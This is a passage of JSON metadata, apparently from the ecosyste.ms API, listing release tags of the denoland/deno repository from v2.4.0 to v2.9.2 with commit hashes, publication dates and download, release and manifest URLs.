ts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"co